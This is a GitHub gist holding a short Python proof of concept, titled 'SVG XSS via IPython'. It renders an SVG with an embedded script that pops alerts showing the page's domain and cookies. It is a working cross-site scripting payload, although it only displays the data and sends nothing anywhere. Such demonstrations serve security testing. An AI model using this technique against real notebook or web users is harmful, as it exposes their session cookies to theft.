Skip to content

Instantly share code, notes, and snippets.

@x0root
Created December 27, 2025 02:36
Show Gist options
  • Select an option

  • Save x0root/a260d9affd04de02d153a02697fafba9 to your computer and use it in GitHub Desktop.

Select an option

Save x0root/a260d9affd04de02d153a02697fafba9 to your computer and use it in GitHub Desktop.
from IPython.display import HTML, display
svg_payload = """
<svg xmlns="http://www.w3.org/2000/svg" width="500" height="200">
<rect width="100%" height="100%" fill="black"/>
<text x="20" y="40" fill="lime" font-size="16">
SVG XSS via IPython
</text>
<script>
alert("Domain: " + document.domain);
alert("Cookie: " + document.cookie);
</script>
</svg>
"""
display(HTML(svg_payload))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment